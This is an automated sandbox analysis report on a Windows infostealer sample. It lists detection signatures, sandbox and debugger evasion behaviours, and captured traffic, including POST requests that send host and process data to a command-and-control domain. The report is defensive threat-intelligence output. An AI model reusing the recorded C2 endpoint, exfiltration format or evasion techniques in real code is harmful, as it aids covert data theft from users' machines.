Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oJkvQZYkrx.exe

Overview

General Information

Sample name:oJkvQZYkrx.exe
renamed because original name is a hash value
Original sample name:8664a5a6e958f985735b8a17171550bc.exe
Analysis ID:1578933
MD5:8664a5a6e958f985735b8a17171550bc
SHA1:3deb8bfcdc32ddf9a678f44c59aa70e3a7f5bb5f
SHA256:ffcc7288342a28c0580bea142951bf4ac33a3f391d8f9323f9e74293d2817e82
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • oJkvQZYkrx.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\oJkvQZYkrx.exe" MD5: 8664A5A6E958F985735B8A17171550BC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: oJkvQZYkrx.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: oJkvQZYkrx.exeReversingLabs: Detection: 68%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: oJkvQZYkrx.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0087DCF0
Source: oJkvQZYkrx.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_008BA5B0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_008BA7F0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_008BA7F0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_008BA7F0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_008BA7F0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_008BA7F0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_008BA7F0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_008BB560
Source: oJkvQZYkrx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0085255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0085255D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008529FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 565286Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 37 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 209Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0091A8C0 recvfrom,0_2_0091A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 565286Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 37 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 20 Dec 2024 15:49:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1588589761.0000000001B37000.00000004.00000020.00020000.00000000.sdmp, oJkvQZYkrx.exe, 00000000.00000002.1630164742.0000000001B39000.00000004.00000020.00020000.00000000.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1588567855.0000000001B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: oJkvQZYkrx.exe, 00000000.00000003.1588567855.0000000001B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: oJkvQZYkrx.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: oJkvQZYkrx.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: oJkvQZYkrx.exe, oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: oJkvQZYkrx.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: oJkvQZYkrx.exe, 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: oJkvQZYkrx.exeStatic PE information: section name:
Source: oJkvQZYkrx.exeStatic PE information: section name: .idata
Source: oJkvQZYkrx.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAB07B0_3_01BAB07B
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAB07B0_3_01BAB07B
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAB07B0_3_01BAB07B
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BAB07B0_3_01BAB07B
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA487D0_3_01BA487D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_3_01BA5D590_3_01BA5D59
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008605B00_2_008605B0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00866FA00_2_00866FA0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0091B1800_2_0091B180
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0088F1000_2_0088F100
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_009200E00_2_009200E0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BDE0300_2_00BDE030
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008B62100_2_008B6210
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0091C3200_2_0091C320
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BA44100_2_00BA4410
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_009204200_2_00920420
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0085E6200_2_0085E620
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BD47800_2_00BD4780
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008BA7F00_2_008BA7F0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BB67300_2_00BB6730
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0091C7700_2_0091C770
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0090C9000_2_0090C900
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008649400_2_00864940
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0085A9600_2_0085A960
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00A26AC00_2_00A26AC0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00B0AAC00_2_00B0AAC0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0085CBB00_2_0085CBB0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BC8BF00_2_00BC8BF0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00B0AB2C0_2_00B0AB2C
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_009E4B600_2_009E4B60
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BDCC700_2_00BDCC70
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BCCD800_2_00BCCD80
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BD4D400_2_00BD4D40
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00B6AE300_2_00B6AE30
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0091EF900_2_0091EF90
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00918F900_2_00918F90
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BA2F900_2_00BA2F90
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00874F700_2_00874F70
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008610E60_2_008610E6
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BBD4300_2_00BBD430
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BC35B00_2_00BC35B0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BA56D00_2_00BA56D0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BE17800_2_00BE1780
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_009098800_2_00909880
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BA99200_2_00BA9920
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BD3A700_2_00BD3A70
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00891BE00_2_00891BE0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BC1BD00_2_00BC1BD0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00B09C800_2_00B09C80
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BB7CC00_2_00BB7CC0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00865DB00_2_00865DB0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00875EB00_2_00875EB0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00863ED00_2_00863ED0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00BD9FE00_2_00BD9FE0
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 008575A0 appears 706 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 00894F40 appears 333 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 009344A0 appears 76 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 00895340 appears 50 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 008950A0 appears 101 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 00A2CBC0 appears 104 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 0086CD40 appears 80 times
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: String function: 008571E0 appears 47 times
